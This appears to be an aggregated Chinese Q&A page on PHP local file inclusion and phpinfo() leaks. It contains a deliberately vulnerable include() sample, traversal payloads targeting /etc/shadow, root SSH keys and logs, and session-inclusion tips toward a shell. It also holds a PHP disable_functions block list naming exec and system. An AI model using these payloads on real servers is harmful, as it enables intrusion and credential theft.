本文目录一览:
- 1、php文件包含漏洞可能造成的危害有哪些
- 2、怎样解决phpinfo()函数信息泄漏
- 3、发现phpinfo信息泄露漏洞 要怎么处理
- 4、文件包含漏洞形成的原因是什么
- 5、如何查找php文件包含漏洞的方法
php文件包含漏洞可能造成的危害有哪些
在接下来的内容中会以代码样本作为例子,来给大家介绍各种奇葩猥琐的利用姿势。
0x01 普通本地文件包含
1
?php
include("inc/"
. $_GET['file']);
?
包含同目录下的文件:
?file=.htaccess
目录遍历:
?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db
(Linux中这两个文件储存着所有文件的路径,需要root权限)
包含错误日志: ?file=../../../../../../../../../var/log/apache/error.log (试试把UA设置为“”来使payload进入日志)
获取web目录或者其他配置文件:
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf
(更多→)
包含上传的附件:
?file=../attachment/media/xxx.file
读取session文件:
?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
(session文件一般在/tmp目录下,格式为sess_[your phpsessid value],有时候也有可能在/var/lib/php5之类的,在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值,也许你能够获得一个shell)
如果拥有root权限还可以试试读这些东西:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件标识符)
/proc/mounts
/proc/config.gz
如果有phpinfo可以包含临时文件:
参见
怎样解决phpinfo()函数信息泄漏
phpinfo()函数返回的信息中包含了服务器的配置信息,包括:1)PHP编译选项以及文件扩展名的相关信息;2)php的版本信息 3)php的配置信息;4)数据库信息;等敏感信息。这些敏感信息会帮助攻击者展开进一步的攻击。
这一般是由于目标站点安装了缺省脚本或者测试文件中调用了phpinfo()函数造成的。
限制此类脚本的访问权限或者删除对phpinfo()函数的调用
发现phpinfo信息泄露漏洞 要怎么处理
(1)通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。
(2)如果确实需要该测试信息,在测试时使用,测试完毕后将该文件删除掉。
(3)若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,
proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,
symlink,popepassthru,stream_socket_server,fsocket,fsockopen
文件包含漏洞形成的原因是什么
导致系统漏洞的原因包括程序逻辑结构设计不合理,不严谨、编程人员程序设计错误以及目前为止硬件无法解决特定的问题:
1、编程人员在设计程序时,对程序逻辑结构设计不合理,不严谨,因此产生一处或者多处漏洞,正是由于这些漏洞,给病毒入侵用户电脑提供了入口。
2、编程人员的程序设计错误也是计算机系统漏洞产生的原因之一,受编程人员的能力、经验和当时安全技术所限,在程序中难免会有不足之处,轻则影响程序效率,重则导致非授权用户的权限提升,这种类型的漏洞最典型的是缓冲区溢出漏洞,它也是被黑客利用得最多的一种类型的漏洞。
3、由于目前硬件无法解决特定的问题,使编程人员只得通过软件设计来表现出硬件功能而产生的漏洞,也会让黑客长驱直入,攻击用户的电脑。
扩展资料:
漏洞的影响范围很广,包括系统本身及其支持软件、网络客户端和服务器软件、网络路由器和安全防火墙。
在不同类型的硬件和软件设备、相同设备的不同版本、不同的系统由不同的设备组成,以及同一系统在不同的设置下,都会存在不同的安全漏洞。
因此,随着时间的推移,旧的系统漏洞会消失,新的系统漏洞会继续出现。系统中的漏洞也依然存在。
如何查找php文件包含漏洞的方法
找360或安全联盟检测接口, 免费的。
主要是查上传漏洞。可以百度下,够学习一段时间的。